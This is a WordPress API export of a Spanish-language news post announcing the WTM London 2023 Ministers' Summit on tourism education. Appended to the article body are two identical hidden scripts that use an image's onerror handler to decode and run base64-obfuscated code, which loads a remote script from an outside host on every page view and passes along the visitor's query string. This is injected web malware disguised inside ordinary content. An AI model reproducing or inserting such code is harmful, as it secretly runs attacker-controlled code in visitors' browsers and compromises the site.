{"id":3221,"date":"2023-10-26T13:46:57","date_gmt":"2023-10-26T16:46:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3221"},"modified":"2025-08-14T00:06:40","modified_gmt":"2025-08-14T03:06:40","slug":"la-cumbre-de-ministros-de-wtm-2023-destacara-la-importancia-de-la-educacion-en-el-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3221","title":{"rendered":"La Cumbre de Ministros de WTM 2023 destacar\u00e1 la importancia de la educaci\u00f3n en el turismo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#03486a\"><em><a href=\"https:\/\/nam11.safelinks.protection.outlook.com\/?url=https%3A%2F%2Fwww.wtm.com%2Flondon%2Fen-gb.html&amp;data=05%7C01%7Cjamille.dedios%40rxglobal.com%7C2b6e2371747744f094ec08dbd3ad5301%7C9274ee3f94254109a27f9fb15c10675d%7C0%7C0%7C638336513616416687%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&amp;sdata=Ano2v2509BpnPiBreMEZtMTmbJpT9iVhanoVoKqoMD8%3D&amp;reserved=0\" target=\"_blank\" rel=\"noopener\" title=\"\">WTM London 2023<\/a>, el evento de viajes y turismo m\u00e1s influyente del mundo, pone de relieve la importancia de la educaci\u00f3n en el sector en la Cumbre de Ministros de este a\u00f1o.<\/em><\/h4>\n\n\n\n<p>El tema que los ministros debatir\u00e1n en la cumbre anual de alto perfil ser\u00e1\u00a0<a href=\"https:\/\/nam11.safelinks.protection.outlook.com\/?url=https%3A%2F%2Fwww.wtm.com%2Flondon%2Fen-gb%2Fwhats-on%2Fconference-programme%2Fsessions-details.3503.206472.ministers-summit-at-world-travel-market-in-association-with-unwto-and-wttc.html&amp;data=05%7C01%7Cjamille.dedios%40rxglobal.com%7C2b6e2371747744f094ec08dbd3ad5301%7C9274ee3f94254109a27f9fb15c10675d%7C0%7C0%7C638336513616416687%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&amp;sdata=WzRAHaqVTBsRbDuPnjU%2BN1mUm7GEcc7KoBZH5fofPQc%3D&amp;reserved=0\" target=\"_blank\" rel=\"noopener\" title=\"\">\u00abTransformar el turismo a trav\u00e9s de la juventud y la educaci\u00f3n\u00bb.<\/a><\/p>\n\n\n\n<p>Tendr\u00e1 lugar el 6<sup>\u00e9simo<\/sup>&nbsp;Noviembre de 2023 \u2013 Primer d\u00eda de WTM London \u2013 con el regreso de la&nbsp;<strong>presentadora de BBC World News<\/strong>,&nbsp;<strong>Zeinab Badawi<\/strong>, para ser la anfitriona de los debates de la mayor reuni\u00f3n anual mundial de ministros de turismo.<\/p>\n\n\n\n<p>Durante 17 a\u00f1os, los l\u00edderes del turismo de todo el mundo se han reunido en World Travel Market, en asociaci\u00f3n con la Organizaci\u00f3n Mundial del Turismo de\u00a0<a href=\"https:\/\/nam11.safelinks.protection.outlook.com\/?url=https%3A%2F%2Fwww.unwto.org%2F&amp;data=05%7C01%7Cjamille.dedios%40rxglobal.com%7C2b6e2371747744f094ec08dbd3ad5301%7C9274ee3f94254109a27f9fb15c10675d%7C0%7C0%7C638336513616416687%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&amp;sdata=p1wqAtTaufw0l7NfskGjkoR6mrSMMSfH3c2EWGBQEXo%3D&amp;reserved=0\" target=\"_blank\" rel=\"noopener\" title=\"\">las Naciones Unidas<\/a>\u00a0(OMT) y el\u00a0<a href=\"https:\/\/nam11.safelinks.protection.outlook.com\/?url=https%3A%2F%2Fwttc.org%2F&amp;data=05%7C01%7Cjamille.dedios%40rxglobal.com%7C2b6e2371747744f094ec08dbd3ad5301%7C9274ee3f94254109a27f9fb15c10675d%7C0%7C0%7C638336513616416687%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&amp;sdata=NhmbI6VL2weGfrrHheJTPvFpsvD1evLkKZI4EDupZnI%3D&amp;reserved=0\" target=\"_blank\" rel=\"noopener\" title=\"\">Consejo Mundial de Viajes y Turismo<\/a>\u00a0(WTTC) para debatir pol\u00edticas, estrategias, desarrollo e inversi\u00f3n.<\/p>\n\n\n\n<p><a href=\"https:\/\/nam11.safelinks.protection.outlook.com\/?url=https%3A%2F%2Fwww.linkedin.com%2Fin%2Fjuliettelosardo%2F%3ForiginalSubdomain%3Duk&amp;data=05%7C01%7Cjamille.dedios%40rxglobal.com%7C2b6e2371747744f094ec08dbd3ad5301%7C9274ee3f94254109a27f9fb15c10675d%7C0%7C0%7C638336513616416687%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&amp;sdata=LAq%2F4mVxXF6Yb%2BkcSDytjrCWACYAPPLWhH%2F35Ir2XQw%3D&amp;reserved=0\" target=\"_blank\" rel=\"noopener\" title=\"\">Juliette Losardo<\/a>, Directora de Exposiciones de World Travel Market London, dijo:<\/p>\n\n\n\n<p>\u00abLa educaci\u00f3n es la piedra angular del desarrollo del turismo sostenible. Invertir en competencias y formaci\u00f3n tur\u00edstica es ahora m\u00e1s importante que nunca.<\/p>\n\n\n\n<p>\u00abLos ministros en la Cumbre explorar\u00e1n las formas en que sus pol\u00edticas de turismo y educaci\u00f3n pueden empoderar a las personas y las comunidades, impulsar la innovaci\u00f3n, fomentar pr\u00e1cticas responsables y apoyar la resiliencia y el \u00e9xito de nuestro sector\u00bb.<\/p>\n\n\n\n<p>La OMT prev\u00e9 un crecimiento continuado de las llegadas de turistas internacionales en los pr\u00f3ximos a\u00f1os, lo que dar\u00e1 lugar a un aumento de las oportunidades de empleo en el sector.<\/p>\n\n\n\n<p>Para 2030, el sector tur\u00edstico podr\u00eda proporcionar empleo a m\u00e1s de 300 millones de personas en todo el mundo, pero una mano de obra cualificada y con conocimientos es vital, lo que requiere que el sector invierta y cierre las brechas existentes en educaci\u00f3n y formaci\u00f3n.<\/p>\n\n\n\n<p>Seg\u00fan el WTTC, los viajes y el turismo emplean a una mayor proporci\u00f3n de trabajadores j\u00f3venes que otros sectores, y los empleos para los j\u00f3venes se han recuperado r\u00e1pidamente despu\u00e9s de la pandemia.<\/p>\n\n\n\n<p>Sus cifras muestran que la participaci\u00f3n de los viajes y el turismo en el empleo juvenil ha crecido del 6,5% en 2010 al 8,2% en 2021.<\/p>\n\n\n\n<p>Adem\u00e1s de buscar formas de cerrar las brechas de habilidades en la educaci\u00f3n y la capacitaci\u00f3n tur\u00edsticas, la Cumbre preguntar\u00e1 c\u00f3mo se pueden fortalecer las asociaciones p\u00fablico-privadas para mejorar el acceso a una educaci\u00f3n de calidad, y c\u00f3mo las instituciones educativas pueden alinear sus cursos con las necesidades cambiantes de la industria del turismo.<\/p>\n\n\n\n<p>Los ministros compartir\u00e1n ejemplos de mejores pr\u00e1cticas y examinar\u00e1n c\u00f3mo se puede mejorar la colaboraci\u00f3n internacional para promover estrategias exitosas en la educaci\u00f3n tur\u00edstica en todo el mundo.<\/p>\n\n\n\n<p>La conversaci\u00f3n de este a\u00f1o en la Cumbre de Ministros se alinear\u00e1 con la campa\u00f1a general del Mercado Mundial de Viajes en torno al Poder del Cambio, con un gran enfoque en la sostenibilidad, la diversidad y la inclusi\u00f3n.<\/p>\n\n\n\n<p>Losardo a\u00f1adi\u00f3:<\/p>\n\n\n\n<p>\u00abLa Cumbre ofrecer\u00e1 una plataforma \u00fanica para que las partes interesadas se re\u00fanan, intercambien ideas y forjen soluciones innovadoras que contribuir\u00e1n a dar forma al viaje educativo en el sector tur\u00edstico.<\/p>\n\n\n\n<p>\u00abEstoy encantado de compartir que &#8216;Transformar el turismo a trav\u00e9s de la juventud y la educaci\u00f3n&#8217; ser\u00e1 el tema de nuestra Cumbre de Ministros, mientras desempe\u00f1amos nuestro papel en la conversaci\u00f3n mundial para crear nuevos futuros\u00bb.<\/p>\n\n\n\n<p>\u2022&nbsp;<strong>La Cumbre de Ministros de la World Travel Market, en asociaci\u00f3n con la OMT y el WTTC<\/strong>, tendr\u00e1 lugar de 11:00 a 13:00 en el Elevate Stage, el primer d\u00eda de WTM London (6 de noviembre).<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>WTM London 2023, el evento de viajes y turismo m\u00e1s influyente del mundo, pone de relieve la importancia de la educaci\u00f3n en el sector en la Cumbre de Ministros de este a\u00f1o. El tema que los ministros debatir\u00e1n en la cumbre anual de alto perfil ser\u00e1\u00a0\u00abTransformar el turismo a trav\u00e9s de la juventud y la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3222,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16,22],"tags":[],"class_list":{"0":"post-3221","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3221"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3221"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3221\/revisions"}],"predecessor-version":[{"id":6938,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3221\/revisions\/6938"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3222"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3221"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3221"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3221"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}